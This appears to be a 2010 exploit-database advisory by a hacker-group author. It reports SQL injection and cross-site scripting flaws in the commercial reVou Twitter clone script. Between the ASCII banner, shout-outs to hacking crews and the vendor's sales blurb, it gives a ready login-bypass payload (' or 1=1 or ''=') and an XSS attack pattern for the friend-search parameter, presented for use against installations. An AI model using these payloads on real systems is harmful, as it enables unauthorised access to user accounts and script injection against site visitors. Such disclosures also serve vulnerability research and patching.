ReVou Twitter Clone 2.0 Beta – SQL Injection / Cross-Site Scripting

  • 作者: Sid3^effects
    日期: 2010-06-06
  • 类别:
  • 来源:
  • # Title:reVou twitter clne Beta 2.0 sqli and Xss vulnerability
    # Author: Sid3^effects
    # Published: 2010-06-06
    # price:$99
    # vendor: Revou
    # url :
    ooooo.oooooo.oooooo oooooo oooo 
    `888' d8P'`Y8b`888.`888. .8' 
     888 888 `888. .8888. .8' 
     888 888`888.8'`888. .8' 
     888 888 `888.8'`888.8'
     888 `88booo`888'`888' 
    o888o `Y8bood8P' `8'`8'
    #####################Sid3^effects aKa HaRi################################## 
    #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] 
    #Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L,CR4C|< 008,M4n0j,MaYuR 
    #spl shoutz:LiquidWorm,gunslinger_ :D
    #Catch us at or 
    Description :
    Existing site owners can benefit from running a micro blogging service resulting in more viral growth for your website when your users interact with follow
    friends by receiving updates via our social network platform. With our SMS integration as well as custom API, we allow you to gain more revenues through
    purchase of SMS credits, revenues from web advertisements and as well benefiting from 3rd party applications built for your site using our API.
    ReVou Micro Blogging social networking script can use for any industries ranging from real estate, cooperate events, hobbyist websites or any social
    networking sites which you can create a platform for your users to get updates or interact with each other.
    Xploit : sqli vulnerability.
    use ' or 1=1 or ''=' to login
    Demo Url : http://server/path/
    Xploit : xssvulnerability
     Parameter Name: search friends or groups
     Parameter Type: Querystring
     Attack Pattern: '"-->
    #spl thks: